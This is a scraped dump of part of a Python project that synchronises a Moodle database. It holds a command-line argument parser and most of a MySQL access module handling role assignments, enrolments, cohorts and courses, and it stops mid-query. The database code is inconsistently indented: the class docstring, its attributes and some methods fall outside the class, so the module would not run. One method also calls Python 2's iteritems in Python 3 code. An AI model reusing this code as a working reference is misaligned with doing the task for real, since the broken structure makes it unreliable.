| {"/test/test_timestamp.py": ["/synchromoodle/config.py"], "/synchromoodle/timestamp.py": ["/synchromoodle/config.py"], "/synchromoodle/arguments.py": ["/synchromoodle/__version__.py"], "/synchromoodle/dbutils.py": ["/synchromoodle/config.py"], "/test/test_ldaputils.py": ["/synchromoodle/config.py", "/synchromoodle/ldaputils.py"], "/synchromoodle/webserviceutils.py": ["/synchromoodle/config.py"], "/test/conftest.py": ["/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py"], "/synchromoodle/__main__.py": ["/synchromoodle/arguments.py", "/synchromoodle/config.py"], "/synchromoodle/actions.py": ["/synchromoodle/synchronizer.py", "/synchromoodle/timestamp.py", "/synchromoodle/arguments.py", "/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py"], "/test/utils/db_utils.py": ["/synchromoodle/dbutils.py"], "/synchromoodle/ldaputils.py": ["/synchromoodle/config.py"], "/test/utils/ldap_utils.py": ["/synchromoodle/ldaputils.py"], "/synchromoodle/synchronizer.py": ["/synchromoodle/arguments.py", "/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py", "/synchromoodle/webserviceutils.py"], "/test/test_config.py": ["/synchromoodle/config.py"], "/test/test_synchronizer.py": ["/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py", "/synchromoodle/synchronizer.py"]} |
78,257 | GIP-RECIA/ESCOSynchroMoodle | refs/heads/develop | /synchromoodle/arguments.py | """
Arguments
"""
from argparse import ArgumentParser
from synchromoodle.__version__ import __version__
def parse_args(args=None, namespace=None):
    """
    Build the command line parser and parse the given arguments.

    :param args: argument list to parse (defaults to sys.argv)
    :param namespace: optional namespace object to populate
    :return: parsed arguments namespace
    """
    cli = ArgumentParser()
    cli.add_argument("-v", "--version", action="version", version='%(prog)s ' + __version__)
    cli.add_argument("-c", "--config", action="append", dest="config", default=[],
                     help="Chemin vers un fichier de configuration. Lorsque cette option est utilisée plusieurs "
                          "fois, les fichiers de configuration sont alors fusionnés.")
    return cli.parse_args(args, namespace)
DEFAULT_ARGS = parse_args([])
| {"/test/test_timestamp.py": ["/synchromoodle/config.py"], "/synchromoodle/timestamp.py": ["/synchromoodle/config.py"], "/synchromoodle/arguments.py": ["/synchromoodle/__version__.py"], "/synchromoodle/dbutils.py": ["/synchromoodle/config.py"], "/test/test_ldaputils.py": ["/synchromoodle/config.py", "/synchromoodle/ldaputils.py"], "/synchromoodle/webserviceutils.py": ["/synchromoodle/config.py"], "/test/conftest.py": ["/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py"], "/synchromoodle/__main__.py": ["/synchromoodle/arguments.py", "/synchromoodle/config.py"], "/synchromoodle/actions.py": ["/synchromoodle/synchronizer.py", "/synchromoodle/timestamp.py", "/synchromoodle/arguments.py", "/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py"], "/test/utils/db_utils.py": ["/synchromoodle/dbutils.py"], "/synchromoodle/ldaputils.py": ["/synchromoodle/config.py"], "/test/utils/ldap_utils.py": ["/synchromoodle/ldaputils.py"], "/synchromoodle/synchronizer.py": ["/synchromoodle/arguments.py", "/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py", "/synchromoodle/webserviceutils.py"], "/test/test_config.py": ["/synchromoodle/config.py"], "/test/test_synchronizer.py": ["/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py", "/synchromoodle/synchronizer.py"]} |
78,258 | GIP-RECIA/ESCOSynchroMoodle | refs/heads/develop | /synchromoodle/dbutils.py | # coding: utf-8
# pylint: disable=too-many-lines
"""
Accès à la base de données Moodle
"""
import mysql.connector
from mysql.connector import MySQLConnection
from mysql.connector.cursor import MySQLCursor
from synchromoodle.config import DatabaseConfig, ConstantesConfig
###############################################################################
# CONSTANTS
###############################################################################
#######################################
# CONTEXTES
#######################################
# Id du contexte systeme
ID_CONTEXT_SYSTEM = 1
# Profondeur pour le contexte etablissement
PROFONDEUR_CTX_ETAB = 2
# Profondeur pour le contexte du bloc de recherche de la zone privee
PROFONDEUR_CTX_BLOCK_ZONE_PRIVEE = 4
# Profondeur pour le contexte du module de la zone privee
PROFONDEUR_CTX_MODULE_ZONE_PRIVEE = 4
# Profondeur pour le contexte de la zone privee
PROFONDEUR_CTX_ZONE_PRIVEE = 3
#######################################
# COURS
#######################################
# Format pour la zone privee d'un etablissement
COURSE_FORMAT_ZONE_PRIVEE = "topics"
# Fullname pour la zone privee d'un etablissement
COURSE_FULLNAME_ZONE_PRIVEE = "Zone privée"
# Shortname pour la zone privee d'un etablissement
# Le (%s) est reserve au siren de l'etablissement
COURSE_SHORTNAME_ZONE_PRIVEE = "ZONE-PRIVEE-%s"
# Summary pour la zone privee d'un etablissement
# Le (%s) est reserve a l'organisation unit de l'etablissement
COURSE_SUMMARY_ZONE_PRIVEE = "Forum réservé au personnel éducatif de l'établissement %s"
# Visibilite pour la zone privee d'un etablissement
COURSE_VISIBLE_ZONE_PRIVEE = 0
#######################################
# MODULE DE COURS
#######################################
# Nombre pour le module du forum dans la zone privee
COURSE_MODULES_MODULE = 5
#######################################
# ROLES
#######################################
# Enrol method => manual enrolment
ENROL_METHOD_MANUAL = "manual"
# Shortname du role admin local
SHORTNAME_ADMIN_LOCAL = "adminlocal"
# Shortname du role extended teacher
SHORTNAME_EXTENDED_TEACHER = "extendedteacher"
# Shortname du role advanced teacher
SHORTNAME_ADVANCED_TEACHER = "advancedteacher"
#######################################
# USER
#######################################
# Default authentication mode for a user
USER_AUTH = "cas"
# Default city for a user
USER_CITY = "Non renseignée"
# Default country for a user
USER_COUNTRY = "FR"
# Default language for a user
USER_LANG = "fr"
# Default moodle site for the user
# This field is a foreign key of the mdl_mnet_host
# Here "3" stands for the ID of lycees.netocentre.fr
USER_MNET_HOST_ID = 3
def array_to_safe_sql_list(elements, name=None):
    """
    Build placeholder text and bind parameters for a safe SQL "IN" clause.

    Without a name, positional ``%s`` placeholders are produced together
    with a tuple of parameters. With a name, named placeholders of the
    form ``%(name_i)s`` are produced together with a parameter dict.

    :param elements: values to bind
    :param name: optional base name for named placeholders
    :return: tuple (comma separated placeholders, bind parameters)
    """
    if not name:
        return ','.join(['%s'] * len(elements)), tuple(elements)
    placeholders = []
    params = {}
    for index, element in enumerate(elements):
        key = '{name}_{i}'.format(name=name, i=index)
        placeholders.append('%({key})s'.format(key=key))
        params[key] = element
    return ','.join(placeholders), params
class Cohort:
    """
    Plain data holder mirroring one row of the Moodle cohort table.
    """
    def __init__(self, cohortid=None, contextid=None,
                 name=None, idnumber=None,
                 description=None, descriptionformat=None,
                 visible=None, component=None,
                 timecreated=None, timemodified=None,
                 theme=None):
        # The row's primary key is exposed as "id"
        self.id = cohortid
        # Id of the owning Moodle context
        self.contextid = contextid
        self.name = name
        self.idnumber = idnumber
        self.description = description
        self.descriptionformat = descriptionformat
        self.visible = visible
        self.component = component
        self.timecreated = timecreated
        self.timemodified = timemodified
        self.theme = theme
class Database:
"""
Couche d'accès à la base de données Moodle.
"""
config = None # type: DatabaseConfig
constantes = None # type: ConstantesConfig
connection = None # type: MySQLConnection
mark = None # type: MySQLCursor
entete = None # type: str
    def __init__(self, config: DatabaseConfig, constantes: ConstantesConfig):
        """
        :param config: database connection settings
        :param constantes: Moodle constants (role/context ids, ...)
        """
        self.config = config
        self.constantes = constantes
        # Table-name prefix (e.g. "mdl_") interpolated into every query
        self.entete = config.entete
    def connect(self):
        """
        Open the connection to the Moodle database and create a cursor.
        """
        self.connection = mysql.connector.connect(host=self.config.host,
                                                  user=self.config.user,
                                                  passwd=self.config.password,
                                                  db=self.config.database,
                                                  charset=self.config.charset,
                                                  port=self.config.port)
        self.mark = self.connection.cursor()
    def disconnect(self):
        """
        Close the cursor and the connection to the Moodle database.
        """
        if self.mark:
            self.mark.close()
            self.mark = None
        if self.connection:
            self.connection.close()
            self.connection = None
    def safe_fetchone(self):
        """
        Fetch a single result row of the last query.

        :return: the single row, or None when the query matched nothing
        :raises mysql.connector.DatabaseError: when several rows were returned
        """
        rows = self.mark.fetchall()
        count = len(rows)
        if count > 1:
            raise mysql.connector.DatabaseError("Résultat de requête SQL invalide: 1 résultat attendu, %d reçus:\n%s"
                                                % (count, self.mark.statement))
        return rows[0] if count == 1 else None
    def add_role_to_user(self, role_id, id_context, id_user):
        """
        Assign a role to a user for a given context, unless the
        assignment already exists.

        :param role_id: int, id of the role
        :param id_context: int, id of the Moodle context
        :param id_user: int, id of the Moodle user
        """
        id_role_assignment = self.get_id_role_assignment(role_id, id_context, id_user)
        if not id_role_assignment:
            # Insert the role assignment for this context
            s = "INSERT INTO {entete}role_assignments( roleid, contextid, userid )" \
                " VALUES ( %(role_id)s, %(id_context)s, %(id_user)s )".format(entete=self.entete)
            self.mark.execute(s, params={'role_id': role_id, 'id_context': id_context, 'id_user': id_user})
    def remove_role_to_user(self, role_id, id_context, id_user):
        """
        Remove a role from a user for a given context, if the
        assignment exists.

        :param role_id: int, id of the role
        :param id_context: int, id of the Moodle context
        :param id_user: int, id of the Moodle user
        """
        id_role_assignment = self.get_id_role_assignment(role_id, id_context, id_user)
        if id_role_assignment:
            # Delete the role assignment from this context
            s = "DELETE FROM {entete}role_assignments" \
                " WHERE roleid = %(role_id)s" \
                " AND contextid = %(id_context)s" \
                " AND userid = %(id_user)s".format(entete=self.entete)
            self.mark.execute(s, params={'role_id': role_id, 'id_context': id_context, 'id_user': id_user})
    def get_id_role_assignment(self, role_id, id_context, id_user):
        """
        Return the id of a role assignment row, or None when absent.

        :param role_id: int, id of the role
        :param id_context: int, id of the Moodle context
        :param id_user: int, id of the Moodle user
        :return: id of the role_assignments row, or None
        """
        s = "SELECT id FROM {entete}role_assignments" \
            " WHERE roleid = %(role_id)s AND contextid = %(id_context)s AND userid = %(id_user)s" \
            " LIMIT 1" \
            .format(entete=self.entete)
        self.mark.execute(s, params={'role_id': role_id, 'id_context': id_context, 'id_user': id_user})
        ligne = self.safe_fetchone()
        if ligne is None:
            return None
        return ligne[0]
def add_role_to_user_for_contexts(self, role_id, ids_contexts_by_courses, id_user):
"""
Fonction permettant d'ajouter un role a un utilisateur
pour plusieurs contextes donnes
:param role_id:
:param ids_contexts_by_courses:
:param id_user:
:return:
"""
for id_course, id_context in ids_contexts_by_courses.iteritems():
self.add_role_to_user(role_id, id_context, id_user)
self.enroll_user_in_course(role_id, id_course, id_user)
    def enroll_user_in_course(self, role_id, id_course, id_user):
        """
        Enrol a user in a course with the given role, creating the
        manual enrolment method on the course when it is missing.

        :param role_id: id of the role
        :param id_course: id of the course
        :param id_user: id of the user
        """
        id_enrol = self.get_id_enrol(ENROL_METHOD_MANUAL, role_id, id_course)
        if not id_enrol:
            # Add the manual enrolment method to the course
            s = "INSERT INTO {entete}enrol(enrol, courseid, roleid)" \
                " VALUES (%(ENROL_METHOD_MANUAL)s, %(id_course)s, %(role_id)s)" \
                .format(entete=self.entete)
            self.mark.execute(s, params={'ENROL_METHOD_MANUAL': ENROL_METHOD_MANUAL, 'id_course': id_course,
                                         'role_id': role_id})
            # NOTE(review): the max-id lookup assumes no concurrent insert
            # happened since the INSERT above — confirm single-writer usage.
            id_enrol = self.get_id_enrol_max()
        if id_enrol:
            # Enrol the user via this enrolment method (no-op if present)
            s = "INSERT IGNORE INTO {entete}user_enrolments(enrolid, userid)" \
                " VALUES (%(id_enrol)s, %(id_user)s)" \
                .format(entete=self.entete)
            self.mark.execute(s, params={'id_enrol': id_enrol, 'id_user': id_user})
    def get_id_enrol_max(self):
        """
        Return the highest id present in the enrol table, or None.
        """
        s = "SELECT id FROM {entete}enrol" \
            " ORDER BY id DESC LIMIT 1" \
            .format(entete=self.entete)
        self.mark.execute(s)
        ligne = self.safe_fetchone()
        if ligne is None:
            return None
        return ligne[0]
    def create_cohort(self, id_context, name, id_number, description, time_created):
        """
        Create a new cohort attached to the given context.

        :param id_context: id of the owning context
        :param name: cohort name
        :param id_number: cohort idnumber
        :param description: cohort description
        :param time_created: creation timestamp (also used as timemodified)
        """
        s = "INSERT INTO {entete}cohort(contextid, name, idnumber, description, descriptionformat, timecreated," \
            " timemodified)" \
            " VALUES (%(id_context)s, %(name)s, %(id_number)s, %(description)s, 0, %(time_created)s," \
            " %(time_created)s)" \
            .format(entete=self.entete)
        self.mark.execute(s, params={'id_context': id_context, 'name': name, 'id_number': id_number,
                                     'description': description, 'time_created': time_created})
    def disenroll_user_from_username_and_cohortname(self, username, cohortname):
        """
        Remove a user (matched by username) from a cohort (matched by name).

        :param username: Moodle username
        :param cohortname: cohort name
        """
        self.mark.execute("DELETE {entete}cohort_members FROM {entete}cohort_members"
                          " INNER JOIN {entete}cohort"
                          " ON {entete}cohort_members.cohortid = {entete}cohort.id"
                          " INNER JOIN {entete}user"
                          " ON {entete}cohort_members.userid = {entete}user.id"
                          " WHERE {entete}user.username = %(username)s"
                          " AND {entete}cohort.name = %(cohortname)s".format(entete=self.entete),
                          params={
                              'username': username,
                              'cohortname': cohortname
                          })
    def delete_empty_cohorts(self):
        """
        Delete every cohort that no longer has any member.
        """
        s = "DELETE FROM {entete}cohort WHERE id NOT IN (SELECT cohortid FROM {entete}cohort_members)" \
            .format(entete=self.entete)
        self.mark.execute(s)
    def get_id_cohort(self, id_context, cohort_name):
        """
        Return the id of a cohort given its name and owning context,
        or None when it does not exist.

        :param id_context: id of the owning context
        :param cohort_name: cohort name
        """
        s = "SELECT id" \
            " FROM {entete}cohort" \
            " WHERE contextid = %(id_context)s" \
            " AND name = %(cohort_name)s" \
            .format(entete=self.entete)
        self.mark.execute(s, params={'id_context': id_context, 'cohort_name': cohort_name})
        ligne = self.safe_fetchone()
        if ligne is None:
            return None
        return ligne[0]
    def get_user_id(self, username):
        """
        Return the id of a Moodle user given its username (compared in
        lower case), or None when unknown.

        :param username: str
        """
        s = "SELECT id FROM {entete}user " \
            "WHERE username = %(username)s" \
            .format(entete=self.entete)
        self.mark.execute(s, params={'username': username.lower()})
        ligne = self.safe_fetchone()
        if ligne is None:
            return None
        return ligne[0]
    def enroll_user_in_cohort(self, id_cohort, id_user, time_added):
        """
        Add a user to a cohort (no-op when already a member).

        :param id_cohort: id of the cohort
        :param id_user: id of the user
        :param time_added: membership timestamp
        """
        s = "INSERT IGNORE" \
            " INTO {entete}cohort_members(cohortid, userid, timeadded)" \
            " VALUES (%(id_cohort)s, %(id_user)s, %(time_added)s)" \
            .format(entete=self.entete)
        self.mark.execute(s, params={'id_cohort': id_cohort, 'id_user': id_user, 'time_added': time_added})
    def purge_cohort_profs(self, id_cohort, list_profs):
        """
        Purge a teachers cohort, keeping only the given user ids.

        NOTE(review): an empty list_profs yields "NOT IN ()" which is
        invalid SQL — confirm callers never pass an empty list.

        :param id_cohort: id of the cohort
        :param list_profs: ids of the users to keep
        """
        ids_list, ids_list_params = array_to_safe_sql_list(list_profs, 'ids_list')
        s = "DELETE FROM {entete}cohort_members" \
            " WHERE cohortid = %(id_cohort)s" \
            " AND userid NOT IN ({ids_list})" \
            .format(entete=self.entete, ids_list=ids_list)
        self.mark.execute(s, params={'id_cohort': id_cohort, **ids_list_params})
    def delete_moodle_local_admins(self, id_context_categorie, ids_not_admin):
        """
        Remove the local admin role, in the given context, from every
        user whose id appears in ids_not_admin. No-op on an empty list.

        :param id_context_categorie: id of the category context
        :param ids_not_admin: ids of the users to strip of the role
        """
        if not ids_not_admin:
            return
        # Build the safe placeholder list for the user ids
        ids_list, ids_list_params = array_to_safe_sql_list(ids_not_admin, 'ids_list')
        # Fetch the id of the local admin role
        id_role_admin_local = self.get_id_role_admin_local()
        # Delete the matching role assignments
        s = "DELETE FROM {entete}role_assignments" \
            " WHERE roleid = %(id_role_admin_local)s" \
            " AND contextid = %(id_context_categorie)s" \
            " AND userid IN ({ids_list})" \
            .format(entete=self.entete, ids_list=ids_list)
        self.mark.execute(s, params={'id_role_admin_local': id_role_admin_local,
                                     'id_context_categorie': id_context_categorie, **ids_list_params})
    def get_id_role_admin_local(self):
        """
        Return the id of the local admin role.
        """
        return self.get_id_role_by_shortname(SHORTNAME_ADMIN_LOCAL)
    def get_id_role_by_shortname(self, short_name):
        """
        Return the id of a role given its shortname.

        :param short_name: role shortname
        :raises ValueError: when no role has this shortname
        """
        s = "SELECT id FROM {entete}role" \
            " WHERE shortname = %(short_name)s" \
            .format(entete=self.entete)
        self.mark.execute(s, params={'short_name': short_name})
        ligne = self.safe_fetchone()
        if ligne is None:
            raise ValueError("Le rôle %s n'existe pas." % short_name)
        return ligne[0]
    def delete_moodle_local_admin(self, id_context_categorie, userid):
        """
        Remove the local admin role from a single user in a context.

        :param id_context_categorie: id of the category context
        :param userid: id of the user
        """
        id_role_admin_local = self.get_id_role_admin_local()
        self.delete_moodle_assignment(id_context_categorie, userid, id_role_admin_local)
    def delete_moodle_assignment(self, id_context_category, userid, roleid):
        """
        Remove a role from a user within a context.

        :param id_context_category: id of the context
        :param userid: id of the user
        :param roleid: id of the role
        """
        s = "DELETE FROM {entete}role_assignments" \
            " WHERE contextid = %(id_context_category)s" \
            " AND roleid = %(roleid)s" \
            " AND userid = %(userid)s" \
            .format(entete=self.entete)
        self.mark.execute(s, params={'id_context_category': id_context_category, 'roleid': roleid, 'userid': userid})
    def delete_role_for_contexts(self, role_id, ids_contexts_by_courses, id_user):
        """
        Remove a role from a user over several contexts, and drop the
        matching manual course enrolments.

        :param role_id: id of the role
        :param ids_contexts_by_courses: dict mapping course ids to context ids
        :param id_user: id of the user
        """
        # Remove the course enrolments
        for id_course in ids_contexts_by_courses:
            # Fetch the manual enrolment method of the course
            id_enrol = self.get_id_enrol(ENROL_METHOD_MANUAL, role_id, id_course)
            if not id_enrol:
                continue
            # Remove the matching user enrolment, if any
            id_user_enrolment = self.get_id_user_enrolment(id_enrol, id_user)
            if id_user_enrolment:
                s = "DELETE FROM {entete}user_enrolments " \
                    "WHERE id = %(id_user_enrolment)s" \
                    .format(entete=self.entete)
                self.mark.execute(s, params={'id_user_enrolment': id_user_enrolment})
        # Remove the role assignments in all the contexts
        ids_list, ids_list_params = array_to_safe_sql_list(ids_contexts_by_courses.values(), 'ids_list')
        s = "DELETE FROM {entete}role_assignments" \
            " WHERE roleid = %(role_id)s" \
            " AND contextid IN ({ids_list})" \
            " AND userid = %(id_user)s" \
            .format(entete=self.entete, ids_list=ids_list)
        self.mark.execute(s, params={'role_id': role_id, 'id_user': id_user, **ids_list_params})
    def get_id_enrol(self, enrol_method, role_id, id_course):
        """
        Return the id of an enrolment method row for a course, or None.

        :param enrol_method: enrolment method name (e.g. "manual")
        :param role_id: id of the role
        :param id_course: id of the course
        """
        s = "SELECT e.id FROM {entete}enrol AS e" \
            " WHERE e.enrol = %(enrol_method)s" \
            " AND e.courseid = %(id_course)s" \
            " AND e.roleid = %(role_id)s" \
            .format(entete=self.entete)
        self.mark.execute(s, params={'enrol_method': enrol_method, 'id_course': id_course, 'role_id': role_id})
        ligne = self.safe_fetchone()
        if ligne is None:
            return None
        return ligne[0]
    def get_id_user_enrolment(self, id_enrol, id_user):
        """
        Return the id of a user enrolment row, or None.

        :param id_enrol: id of the enrolment method
        :param id_user: id of the user
        """
        s = "SELECT id" \
            " FROM {entete}user_enrolments " \
            " WHERE userid = %(id_user)s" \
            " AND enrolid = %(id_enrol)s" \
            .format(entete=self.entete)
        self.mark.execute(s, params={'id_user': id_user, 'id_enrol': id_enrol})
        ligne = self.safe_fetchone()
        if ligne is None:
            return None
        return ligne[0]
    def delete_roles(self, ids_roles):
        """
        Delete role assignment rows by their ids.

        :param ids_roles: ids of the role_assignments rows to delete
        """
        # Build the safe placeholder list for the row ids
        ids_list, ids_list_params = array_to_safe_sql_list(ids_roles, 'ids_list')
        s = "DELETE FROM {entete}role_assignments" \
            " WHERE id IN ({ids_list})" \
            .format(entete=self.entete, ids_list=ids_list)
        self.mark.execute(s, params={**ids_list_params})
    def disenroll_user_from_cohorts(self, ids_cohorts_to_keep, id_user):
        """
        Remove a user from every cohort except the listed ones.

        NOTE(review): an empty ids_cohorts_to_keep yields "NOT IN ()",
        which is invalid SQL — confirm callers never pass an empty list.

        :param ids_cohorts_to_keep: ids of the cohorts to keep the user in
        :param id_user: id of the user
        """
        # Build the safe placeholder list for the cohort ids
        ids_list, ids_list_params = array_to_safe_sql_list(ids_cohorts_to_keep, 'ids_list')
        s = "DELETE FROM {entete}cohort_members" \
            " WHERE userid = %(id_user)s" \
            " AND cohortid NOT IN ({ids_list})" \
            .format(entete=self.entete, ids_list=ids_list)
        self.mark.execute(s, params={'id_user': id_user, **ids_list_params})
    def disenroll_user_from_cohort(self, id_cohort, id_user):
        """
        Remove a user from a single cohort.

        :param id_cohort: id of the cohort
        :param id_user: id of the user
        """
        s = "DELETE FROM {entete}cohort_members" \
            " WHERE cohortid = %(id_cohort)s" \
            " AND userid = %(id_user)s" \
            .format(entete=self.entete)
        self.mark.execute(s, params={'id_cohort': id_cohort, 'id_user': id_user})
    def get_cohort_name(self, id_cohort):
        """
        Return the name of a cohort, or None when it does not exist.

        :param id_cohort: id of the cohort
        """
        s = "SELECT name FROM {entete}cohort" \
            " WHERE id = %(id_cohort)s" \
            .format(entete=self.entete)
        self.mark.execute(s, params={'id_cohort': id_cohort})
        ligne = self.safe_fetchone()
        if ligne is None:
            return None
        return ligne[0]
    def get_description_course_category(self, id_category):
        """
        Return the description of a course category, or None.

        :param id_category: id of the category
        """
        s = "SELECT description" \
            " FROM {entete}course_categories" \
            " WHERE id = %(id_category)s" \
            .format(entete=self.entete)
        self.mark.execute(s, params={'id_category': id_category})
        ligne = self.safe_fetchone()
        if ligne is None:
            return None
        return ligne[0]
    def get_descriptions_course_categories_by_themes(self, themes):
        """
        Return the descriptions of the course categories whose theme is
        in the given list.

        :param themes: themes to match
        :return: list of descriptions (empty when nothing matches)
        """
        ids_list, ids_list_params = array_to_safe_sql_list(themes, 'ids_list')
        s = "SELECT description" \
            " FROM {entete}course_categories" \
            " WHERE theme IN ({ids_list})" \
            .format(entete=self.entete, ids_list=ids_list)
        self.mark.execute(s, params={**ids_list_params})
        result_set = self.mark.fetchall()
        if not result_set:
            return []
        descriptions = [result[0] for result in result_set]
        return descriptions
    def get_id_block(self, parent_context_id):
        """
        Return the id of a block instance given its parent context, or None.

        :param parent_context_id: id of the parent context
        """
        s = "SELECT id" \
            " FROM {entete}block_instances" \
            " WHERE parentcontextid = %(parent_context_id)s" \
            .format(entete=self.entete)
        self.mark.execute(s, params={'parent_context_id': parent_context_id})
        ligne = self.safe_fetchone()
        if ligne is None:
            return None
        return ligne[0]
    def get_course_timemodified(self, course_id: int):
        """
        Return the "timemodified" field of a course, or None.

        :param course_id: id of the course
        """
        s = "SELECT timemodified FROM {entete}course" \
            " WHERE id = %(course_id)s" \
            .format(entete=self.entete)
        self.mark.execute(s, params={'course_id': course_id})
        ligne = self.safe_fetchone()
        if ligne is None:
            return None
        return ligne[0]
    def delete_course(self, course_id: int):
        """
        Delete the course row with the given id.

        :param course_id: id of the course
        """
        s = "DELETE FROM {entete}course WHERE id = %(course_id)s" \
            .format(entete=self.entete)
        self.mark.execute(s, params={
            'course_id': course_id
        })
    def get_courses_ids_owned_by(self, user_id: int):
        """
        Return the context instance ids of the courses on which the user
        holds the "course owner" role, as raw cursor rows.

        :param user_id: id of the user
        """
        s = "SELECT instanceid FROM {entete}context AS context" \
            " INNER JOIN {entete}role_assignments AS role_assignments" \
            " ON context.id = role_assignments.contextid" \
            " WHERE role_assignments.userid = %(userid)s AND role_assignments.roleid = %(roleid)s" \
            .format(entete=self.entete)
        self.mark.execute(s, params={'userid': user_id, 'roleid': self.constantes.id_role_proprietaire_cours})
        return self.mark.fetchall()
    def get_userids_owner_of_course(self, course_id: int):
        """
        Return the ids of the users holding the "course owner" role on
        the given course, as raw cursor rows.

        :param course_id: id of the course
        """
        s = "SELECT userid FROM {entete}role_assignments AS role_assignments" \
            " INNER JOIN {entete}context AS context" \
            " ON role_assignments.contextid = context.id" \
            " WHERE context.instanceid = %(courseid)s AND role_assignments.roleid = %(roleid)s" \
            .format(entete=self.entete)
        self.mark.execute(s, params={'courseid': course_id, 'roleid': self.constantes.id_role_proprietaire_cours})
        return self.mark.fetchall()
    def get_id_categorie(self, categorie_name):
        """
        Return the id of a course category given its name, or None.

        :param categorie_name: category name
        """
        s = "SELECT id" \
            " FROM {entete}course_categories" \
            " WHERE name = %(categorie_name)s" \
            .format(entete=self.entete)
        self.mark.execute(s, params={'categorie_name': categorie_name})
        ligne = self.safe_fetchone()
        return ligne[0] if ligne else None
    def get_id_context_no_depth(self, context_level, instance_id):
        """
        Return the id of a context given its level and instance id
        (depth not constrained), or None.

        :param context_level: context level
        :param instance_id: id of the associated instance
        """
        s = "SELECT id" \
            " FROM {entete}context" \
            " WHERE contextlevel = %(context_level)s" \
            " AND instanceid = %(instance_id)s" \
            .format(entete=self.entete)
        self.mark.execute(s, params={'context_level': context_level, 'instance_id': instance_id})
        ligne = self.safe_fetchone()
        if ligne is None:
            return None
        return ligne[0]
    def get_id_context(self, context_level, depth, instance_id):
        """
        Return the id of a context given its level, depth and instance
        id, or None.

        :param context_level: context level
        :param depth: context depth
        :param instance_id: id of the associated instance
        """
        s = "SELECT id" \
            " FROM {entete}context" \
            " WHERE contextlevel = %(context_level)s" \
            " AND depth = %(depth)s" \
            " AND instanceid = %(instance_id)s" \
            .format(entete=self.entete)
        self.mark.execute(s, params={'context_level': context_level, 'depth': depth, 'instance_id': instance_id})
        ligne = self.safe_fetchone()
        if ligne is None:
            return None
        return ligne[0]
    def get_id_context_categorie(self, id_etab_categorie):
        """
        Return the id of the context of a school category.

        :param id_etab_categorie: id of the school category
        """
        return self.get_id_context(self.constantes.niveau_ctx_categorie, 2, id_etab_categorie)
    def get_id_context_inter_etabs(self):
        """
        Return the id of the inter-schools category context, or None.
        """
        s = "SELECT id" \
            " FROM {entete}context" \
            " WHERE contextlevel = %(context_level)s" \
            " AND instanceid = %(instanceid)s" \
            .format(entete=self.entete)
        self.mark.execute(s, params={'context_level': self.constantes.niveau_ctx_categorie,
                                     'instanceid': self.constantes.id_instance_moodle})
        ligne = self.safe_fetchone()
        if ligne is None:
            return None
        return ligne[0]
    def get_id_course_by_id_number(self, id_number):
        """
        Return the id of a course given its idnumber, or None.

        :param id_number: course idnumber
        """
        s = "SELECT id" \
            " FROM {entete}course" \
            " WHERE idnumber = %(id)s" \
            .format(entete=self.entete)
        self.mark.execute(s, params={'id': id_number})
        ligne = self.safe_fetchone()
        if ligne is None:
            return None
        return ligne[0]
    def get_id_course_category_by_id_number(self, id_number):
        """
        Return the id of a course category whose idnumber contains the
        given value (LIKE '%value%'), or None.

        :param id_number: value searched inside the category idnumber
        """
        s = "SELECT id" \
            " FROM {entete}course_categories" \
            " WHERE idnumber" \
            " LIKE %(id)s" \
            .format(entete=self.entete)
        self.mark.execute(s, params={'id': '%' + str(id_number) + '%'})
        ligne = self.safe_fetchone()
        if ligne is None:
            return None
        return ligne[0]
    def get_id_course_category_by_theme(self, theme):
        """
        Return the id of a course category given its theme, or None.

        :param theme: category theme
        """
        s = "SELECT id" \
            " FROM {entete}course_categories" \
            " WHERE theme = %(theme)s" \
            .format(entete=self.entete)
        self.mark.execute(s, params={'theme': theme})
        ligne = self.safe_fetchone()
        if ligne is None:
            return None
        return ligne[0]
    def get_id_course_module(self, course):
        """
        Return the id of a course module given its course, or None.

        NOTE(review): safe_fetchone raises when the course has several
        modules — confirm callers only use this on single-module courses.

        :param course: id of the course
        """
        s = "SELECT id" \
            " FROM {entete}course_modules" \
            " WHERE course = %(course)s" \
            .format(entete=self.entete)
        self.mark.execute(s, params={'course': course})
        ligne = self.safe_fetchone()
        if ligne is None:
            return None
        return ligne[0]
    def get_id_forum(self, course):
        """
        Return the id of the forum attached to a course, or None.

        :param course: id of the course
        """
        s = "SELECT id" \
            " FROM {entete}forum" \
            " WHERE course = %(course)s" \
            .format(entete=self.entete)
        self.mark.execute(s, params={'course': course})
        ligne = self.safe_fetchone()
        if ligne is None:
            return None
        return ligne[0]
    def get_id_user_info_data(self, id_user, id_field):
        """
        Return the id of a user_info_data row given its user and custom
        profile field, or None.

        :param id_user: id of the user
        :param id_field: id of the custom profile field
        """
        s = "SELECT id" \
            " FROM {entete}user_info_data " \
            " WHERE userid = %(id_user)s" \
            " AND fieldid = %(id_field)s" \
            .format(entete=self.entete)
        self.mark.execute(s, params={'id_user': id_user, 'id_field': id_field})
        ligne = self.safe_fetchone()
        if ligne is None:
            return None
        return ligne[0]
    def get_id_user_info_field_by_shortname(self, short_name):
        """
        Return the id of a custom profile field given its shortname,
        or None.

        :param short_name: field shortname
        """
        s = "SELECT id" \
            " FROM {entete}user_info_field" \
            " WHERE shortname = %(short_name)s" \
            .format(entete=self.entete)
        self.mark.execute(s, params={'short_name': short_name})
        ligne = self.safe_fetchone()
        if ligne is None:
            return None
        return ligne[0]
def get_ids_and_summaries_not_allowed_roles(self, id_user, allowed_forums_shortnames):
    """Return role-assignment ids and course summaries for private-zone forum
    roles the user should no longer hold.

    Any 'ZONE-PRIVEE-%' course whose shortname is NOT in the allowed list and
    on which the user still has a role assignment is reported.

    :param id_user: moodle id of the user
    :param allowed_forums_shortnames: shortnames of the forums still allowed
    :return: tuple (list of role_assignment ids, list of course summaries)
    """
    # Build a safely parameterised IN (...) clause from the shortnames.
    ids_list, ids_list_params = array_to_safe_sql_list(allowed_forums_shortnames, 'ids_list')
    s = "SELECT mra.id, mco.summary" \
        " FROM {entete}course mco, {entete}role_assignments mra, {entete}context mc" \
